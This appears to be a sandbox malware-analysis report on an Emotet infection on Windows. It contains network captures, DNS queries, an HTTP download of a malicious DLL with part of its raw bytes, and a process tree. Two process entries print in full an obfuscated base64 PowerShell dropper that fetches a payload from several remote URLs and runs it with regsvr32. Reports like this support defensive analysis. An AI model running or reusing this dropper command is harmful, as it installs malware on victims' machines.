                                                                                                  May 23, 2022 04:12:15.606662989 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.606702089 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.606748104 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.606811047 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.607521057 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607563019 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607604027 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607642889 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607655048 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.607682943 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607685089 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.607705116 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.607721090 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607760906 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607785940 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.607801914 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607841015 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607880116 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607893944 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.607920885 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607963085 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.607979059 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608004093 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608016968 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608042955 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608083963 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608112097 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608124018 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608161926 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608176947 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608200073 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608241081 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608258963 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608278990 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608319044 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608336926 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608357906 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608397007 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608488083 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608494043 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608544111 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608581066 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608597994 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608622074 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608633995 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608661890 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608700991 CEST804974198.142.105.106192.168.2.3
                                                                                                  May 23, 2022 04:12:15.608716965 CEST4974180192.168.2.398.142.105.106
                                                                                                  May 23, 2022 04:12:15.608741045 CEST804974198.142.105.106192.168.2.3
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 23, 2022 04:12:14.649113894 CEST6485153192.168.2.38.8.8.8
                                                                                                  May 23, 2022 04:12:14.787208080 CEST53648518.8.8.8192.168.2.3
                                                                                                  May 23, 2022 04:12:14.801043987 CEST4931653192.168.2.38.8.8.8
                                                                                                  May 23, 2022 04:12:14.939541101 CEST53493168.8.8.8192.168.2.3
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  May 23, 2022 04:12:14.649113894 CEST192.168.2.38.8.8.80x536cStandard query (0)www.jsonsintl.comA (IP address)IN (0x0001)
                                                                                                  May 23, 2022 04:12:14.801043987 CEST192.168.2.38.8.8.80x9fdfStandard query (0)www.jsonsintl.comA (IP address)IN (0x0001)
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  May 23, 2022 04:12:14.787208080 CEST8.8.8.8192.168.2.30x536cNo error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                                                                                  May 23, 2022 04:12:14.787208080 CEST8.8.8.8192.168.2.30x536cNo error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)
                                                                                                  May 23, 2022 04:12:14.939541101 CEST8.8.8.8192.168.2.30x9fdfNo error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                                                                                  May 23, 2022 04:12:14.939541101 CEST8.8.8.8192.168.2.30x9fdfNo error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)
                                                                                                  • www.jsonsintl.com
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.34974198.142.105.10680C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 23, 2022 04:12:15.083039045 CEST1129OUTGET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                  Host: www.jsonsintl.com
                                                                                                  Connection: Keep-Alive
                                                                                                  May 23, 2022 04:12:15.349484921 CEST1130INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 23 May 2022 02:12:15 GMT
                                                                                                  Server: Apache
                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 23 May 2022 02:12:15 GMT
                                                                                                  Content-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"
                                                                                                  Content-Transfer-Encoding: binary
                                                                                                  Set-Cookie: 628aed7f4404a=1653271935; expires=Mon, 23-May-2022 02:13:15 GMT; Max-Age=60; path=/
                                                                                                  Last-Modified: Mon, 23 May 2022 02:12:15 GMT
                                                                                                  Content-Length: 365056
                                                                                                  Vary: Accept-Encoding,User-Agent
                                                                                                  Keep-Alive: timeout=5, max=40
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-msdownload
                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.reloc@


                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:04:11:44
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                                                                                                  Imagebase:0xc20000
                                                                                                  File size:232960 bytes
                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:1
                                                                                                  Start time:04:11:45
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:2
                                                                                                  Start time:04:11:45
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                                                                                  Imagebase:0xa60000
                                                                                                  File size:430592 bytes
                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:high

                                                                                                  Target ID:6
                                                                                                  Start time:04:12:03
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:7
                                                                                                  Start time:04:12:07
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:8
                                                                                                  Start time:04:12:08
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:9
                                                                                                  Start time:04:12:08
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:10
                                                                                                  Start time:04:12:09
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:11
                                                                                                  Start time:04:12:10
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                  Imagebase:0x7ff700940000
                                                                                                  File size:163336 bytes
                                                                                                  MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:12
                                                                                                  Start time:04:12:10
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:14
                                                                                                  Start time:04:12:15
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:15
                                                                                                  Start time:04:12:16
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                                                                                                  Imagebase:0x1280000
                                                                                                  File size:20992 bytes
                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:16
                                                                                                  Start time:04:12:17
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline: C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                                                                                                  Imagebase:0x7ff75d180000
                                                                                                  File size:24064 bytes
                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                  Target ID:17
                                                                                                  Start time:04:12:21
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
                                                                                                  Imagebase:0x7ff75d180000
                                                                                                  File size:24064 bytes
                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                  Target ID:18
                                                                                                  Start time:04:12:21
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:19
                                                                                                  Start time:04:12:22
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:20
                                                                                                  Start time:04:12:34
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:22
                                                                                                  Start time:04:12:45
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:29
                                                                                                  Start time:04:13:07
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                  Imagebase:0x7ff73c930000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:30
                                                                                                  Start time:04:13:11
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                  Imagebase:0x7ff7b0320000
                                                                                                  File size:455656 bytes
                                                                                                  MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:31
                                                                                                  Start time:04:13:11
                                                                                                  Start date:23/05/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  No disassembly